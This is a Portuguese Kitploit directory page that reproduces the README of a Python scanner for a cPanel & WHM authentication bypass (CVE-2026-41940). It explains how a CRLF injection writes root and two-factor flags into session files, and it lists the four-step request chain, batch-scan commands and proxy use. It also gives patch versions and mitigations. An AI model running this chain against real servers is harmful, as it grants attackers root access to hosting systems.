Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cPanel-WHM-CVE-2026-41940-AuthBypass — Scanner para bypass de autenticação do cPanel & WHM (CVE-2026-41940) que detecta versões vulneráveis via injeção CRLF e manipulação de sessão, com suporte a multi-threading e proxy. | Kitploit
Ferramentas/GitHubGitHub/isee857/cpanel-whm-cve-2026-41940-authbypass
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubisee857/cpanel-whm-cve-2026-41940-authbypass

cPanel-WHM-CVE-2026-41940-AuthBypass

Scanner para bypass de autenticação do cPanel & WHM (CVE-2026-41940) que detecta versões vulneráveis via injeção CRLF e manipulação de sessão, com suporte a multi-threading e proxy.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41940 Scanner de Bypass de Autenticação cPanel & WHM

⚠️ Aviso Legal

Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e fins educacionais. O utilizador deve cumprir as leis e regulamentos locais, sendo estritamente proibido efetuar scans em sistemas não autorizados. O autor não se responsabiliza por qualquer uso indevido.


🔥 Resumo da Vulnerabilidade

ItemDetalhes
ID CVECVE-2026-41940
Nome da VulnerabilidadeInjeção CRLF no Ficheiro de Sessão cPanel & WHM
Nível de Gravidade🔴 CRÍTICO (CVSS 9.8)
Versões AfetadascPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 / 11.132.0.29 / 11.134.0.20 / 11.136.0.5
Tipo de VulnerabilidadeBypass de Autenticação → Obtenção de Privilégios Root
Dificuldade de ExploraçãoBaixa

Princípio da Vulnerabilidade

O cPanel & WHM apresenta uma falha lógica no processamento de ficheiros de sessão:

  1. A função saveSession() chama filter_sessiondata() após escrever o ficheiro de sessão
  2. O atacante pode construir um cabeçalho Authorization: Basic contendo injeção CRLF
  3. O payload malicioso é escrito diretamente no ficheiro de sessão em disco, injetando campos como hasroot=1, tfa_verified=1
  4. Isto permite contornar a autenticação do WHM e obter acesso de nível root

✨ Funcionalidades

✅ Deteção precisa - Reproduz rigorosamente a cadeia de exploração original
✅ Sem dependências - Utiliza apenas a biblioteca padrão do Python
✅ Multithreading - Suporta scans em lote
✅ Suporte a proxy - Compatível com Burp Suite/Owasp ZAP
✅ Análise inteligente - Preenche automaticamente protocolo e porta
✅ Saída destacada - Resultados de vulnerabilidade em vermelho bem visível

Fluxo de Deteção (4 Etapas)

root@kitploit:~
[1] POST /login/?login_only=1          → Obter sessão pré-autenticada
[2] GET / + Injeção CRLF               → Corromper o ficheiro de sessão
[3] GET /scripts2/listaccts           → Acionar a limpeza da cache
[4] GET /cpsess/token/json-api/version → Verificar privilégios Root

🚀 Início Rápido

Requisitos do Ambiente

  • Python 3.6+

Descarregar o Script

root@kitploit:~
wget https://github.com/iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass/blob/main/cPanel-WHM-CVE-2026-41940-AuthBypass.py
chmod +x cPanel-WHM-CVE-2026-41940-AuthBypass.py

📖 Instruções de Utilização

Deteção de Alvo Único

root@kitploit:~
# Preenchimento automático de https://
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087

# Especificar URL completo
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u https://example.com:2087

Deteção em Lote

root@kitploit:~
# Ler alvos de um ficheiro
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt -t 20

# Formato do targets.txt:
# 1.2.3.4:2087
# example.com:2087
# https://test.com:2087

Deteção com Proxy (em conjunto com Burp Suite)

root@kitploit:~
# Utilizar proxy HTTP
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -u 1.2.3.4:2087 --proxy http://127.0.0.1:8080

# Scan em lote através de proxy
python3 cPanel-WHM-CVE-2026-41940-AuthBypass.py -f targets.txt --proxy http://127.0.0.1:8080 -t 5

Parâmetros Comuns

ParâmetroDescriçãoExemplo
-u, --urlAlvo único-u 1.2.3.4:2087
-f, --fileFicheiro com lista de alvos-f targets.txt
-t, --threadsNúmero de threads (padrão: 10)-t 20
--timeoutTempo limite (padrão: 10 segundos)--timeout 15
--proxyProxy HTTP/HTTPS--proxy http://127.0.0.1:8080

📊 Exemplo de Saída

Vulnerabilidade Presente (destaque vermelho)

root@kitploit:~
13:45:01 [SCAN] Testing 1.2.3.4:2087
13:45:02 [INFO] Got session: 9f3a2c1b8d...
13:45:02 [INFO] Got token: /cpsess1234567890
13:45:03 [VULN] CVE-2026-41940 CONFIRMED! 1.2.3.4:2087
ScreenShot_2025-12-19_151413_652

Vulnerabilidade Ausente

root@kitploit:~
13:46:01 [SCAN] Testing 5.6.7.8:2087
13:46:02 [ERR ] Failed to get session 5.6.7.8:2087

🔍 Notas sobre a Verificação da Vulnerabilidade

O script confirma a vulnerabilidade através da seguinte lógica:

  1. Obtenção de Sessão: Obtém com sucesso o cookie whostmgrsession
  2. Extração de Token: A resposta contém o caminho /cpsess{digit}
  3. Verificação de Privilégios: O acesso a /json-api/version retorna 200 e contém o campo "version"

⚠️ Nota: Alguns alvos podem retornar 500/503 e exibir "License", o que ainda indica que o bypass de autenticação foi bem-sucedido, apenas falta a licença comercial.


🛡️ Recomendações de Correção

Atualize imediatamente para as seguintes versões seguras:

  • 11.110.0.97+
  • 11.118.0.63+
  • 11.126.0.54+
  • 11.132.0.29+
  • 11.134.0.20+
  • 11.136.0.5+

Medidas de Mitigação Temporárias:

  1. Restringir os IPs com acesso à porta do WHM (2087)
  2. Ativar regras de firewall
  3. Monitorizar alterações anómalas no diretório /var/cpanel/sessions/

🙏 Referências e Agradecimentos

https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/


⚠️ Reforço Final

Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e investigação defensiva. Qualquer scan não autorizado constitui uma violação da lei, sendo da inteira responsabilidade do utilizador.


Dá ⭐ a este projeto para obteres mais atualizações de ferramentas de segurança!

Baixar ferramenta